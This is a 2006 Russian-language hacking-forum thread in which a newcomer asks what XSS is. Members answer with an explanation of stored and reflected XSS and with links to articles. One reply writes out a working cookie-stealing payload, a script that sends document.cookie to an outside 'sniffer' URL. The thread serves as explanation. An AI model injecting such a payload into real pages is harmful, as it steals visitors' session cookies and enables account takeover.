Что такое ксс, и с чем его едят?

Discussion in 'Уязвимости' started by MC_Brute, 22 Sep 2006.

Thread Status:
Not open for further replies.
  1. MC_Brute

    MC_Brute Elder - Старейшина

    Joined:
    15 Sep 2006
    Messages:
    35
    Likes Received:
    31
    Reputations:
    -4
    Думаю из названия понятно. Надеюсь на вашу помощь!
     
  2. Ksander

    Ksander Elder - Старейшина

    Joined:
    21 Jun 2006
    Messages:
    526
    Likes Received:
    260
    Reputations:
    138
    Если коротко, то

    XSS(активные и пассивные)

    Уязвимости класса xss в сущности сводятся к тому, что пользователь может внедрить в страницу произвольный html-код. Это может случиться если фильтрация вводимых символов организованна некорректно(или её вопще нет).
    Часто подобные аттаки организуются через любые поля ввода.Эти уязвимости делятся на две подкатегории: активный xss и пассивный xss.
    Ативный xss-исполнение html кода, без "активных" действий пользователя. На примере форума: плохой программист не позаботился о фильтрации html тегов,
    тогда злой дядька пишет сообщение
    "Привет, какой классный у вас форум <script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>"
    в результате просмотра этого сообщения пользователем его cookie "уплывут" на "сниффер".
    Перейдём к пассивному XSS. Отличается от активного он тем, что для успешного проведения атаки пользователь должен пройти по специально составленной, предложенной ему ссылке, ведущей куда-либо на том же сайте откуда мы хотим увести куки. Обычно для такой атаки используются адресная строка браузера,поле search(работающее методом get),либо фрейм.





    Вот тебе ссылка, почитай, там все подробно написано http://www.webfile.ru/1117230

    Вот еще http://paradox.3bb.ru/viewtopic.php?pid=43

    p.s.а самая главная ссылка это вот

    http://www.google.com.ua/search?hl=uk&ie=windows-1251&q=%C2%F1%E5+%EE+XSS&meta=

    и

    www.google.com\ru\ua
    www.ya.ru
    www.rambler.ru
    www.aport.ru
    ;)
     
    #2 Ksander, 22 Sep 2006
    Last edited: 22 Sep 2006
  3. BlackDog

    BlackDog Elder - Старейшина

    Joined:
    5 Jul 2006
    Messages:
    53
    Likes Received:
    19
    Reputations:
    -8
    Rtfm!



    ======

    Пока устный выговор. Впредь пиши по сути дела

    DRON-ANARCHY
     
    #3 BlackDog, 22 Sep 2006
    Last edited by a moderator: 22 Sep 2006
    1 person likes this.
  4. Kaban

    Kaban Elder - Старейшина

    Joined:
    19 Mar 2006
    Messages:
    248
    Likes Received:
    78
    Reputations:
    14
    вот ссылки на статьи:
    http://www.forum.antichat.ru/thread11807.html

    http://antichat.ru/crackchat/HTML/

    http://forum.antichat.ru/thread20140.html

    читай и учи!!! =)
     
  5. $n@ke

    $n@ke Elder - Старейшина

    Joined:
    18 Sep 2006
    Messages:
    696
    Likes Received:
    404
    Reputations:
    134
    да, и еще одна:
    http://www2.packetstormsecurity.org

    Практика - Лучший учитель...имхо
     
  6. max_pain89

    max_pain89 Eat `em UP!

    Joined:
    11 Dec 2004
    Messages:
    451
    Likes Received:
    140
    Reputations:
    146
    Если я тебя правельно понял, то вот http://www.w3.org/Style/CSS/

    А редактировать CSS можно с помощью "офисной утилиты" FrontPage

    Ну а если не правельно, то х с ним.
     
  7. Digimortal

    Digimortal Banned

    Joined:
    22 Aug 2006
    Messages:
    471
    Likes Received:
    248
    Reputations:
    189
    Наверно все-таки неправильно...

    Если вопрос по каск. таблицам - то это не в тот раздел тема (да и вообще, не в тот форум...)
     
  8. .Slip

    .Slip Elder - Старейшина

    Joined:
    16 Jan 2006
    Messages:
    1,571
    Likes Received:
    977
    Reputations:
    783
    На вопрос ответили с избытком. Привели много ссылок. Теперь только читать и понимать, а тут уже помочь никак. Тема закрыта.
    ЗЫ Если будет очень уж большая неоюходимость здесь отпостить, пишите в ПМ, тему открою
     
    #8 .Slip, 23 Sep 2006
    Last edited: 24 Sep 2006
Thread Status:
Not open for further replies.